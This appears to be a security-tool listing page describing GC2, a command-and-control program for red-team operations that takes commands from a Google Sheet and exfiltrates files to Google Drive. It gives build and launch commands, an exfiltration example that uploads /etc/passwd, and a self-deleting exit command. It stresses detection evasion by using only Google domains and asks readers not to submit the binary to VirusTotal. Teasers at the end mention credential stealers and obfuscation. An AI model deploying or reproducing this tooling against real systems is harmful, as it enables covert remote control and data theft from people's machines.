GC2 (Google Command and Control) is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrates data using Google Drive.
This program has been developed in order to provide a command and control that does not require any particular set up (like: a custom domain, VPS, CDN, …) during Red Teaming activities.
Furthermore, the program will interact only with Google’s domains (*.google.com) to make detection more difficult.
PS: Please don’t upload the compiled binary on VirusTotal 🙂
Build executable
git clone https://github.com/looCiprian/GC2-sheet
cd GC2-sheet
go build gc2-sheet.go
Create a new Google Drive folder and add the service account to the editor group of the folder (to add the service account use its email)
Start the C2
gc2-sheet –key <GCP service account credential file .JSON> –sheet <Google sheet ID> –drive <Google drive ID>
The program will perform a request to the spreedsheet every 5 sec to check if there are some new commands. Commands must be inserted in the column “A”, and the output will be printed in the column “B”.
Special commands are reserved to perform the upload and download to the target machine
From Target to Google Drive
upload;
Example:
upload;/etc/passwd
Download file
Special commands are reserved to perform the upload and download to the target machine
From Google Drive to Target
download;;
Example:
download;;/home/user/downloaded.txt
Exit
By sending the command exit, the program will delete itself from the target and kill its process
PS: From os documentation: If a symlink was used to start the process, depending on the operating system, the result might be the symlink or the path it pointed to. In this case the symlink is deleted.
JBDev is a specialized development tool designed to streamline the creation and debugging of jailbreak…
The Kereva LLM Code Scanner is an innovative static analysis tool tailored for Python applications…
Nuclei-Templates-Labs is a dynamic and comprehensive repository designed for security researchers, learners, and organizations to…
SSH-Stealer and RunAs-Stealer are malicious tools designed to stealthily harvest SSH credentials, enabling attackers to…
Control flow flattening is a common obfuscation technique used by OLLVM (Obfuscator-LLVM) to transform executable…
Cybersecurity tools play a critical role in safeguarding digital assets, systems, and networks from malicious…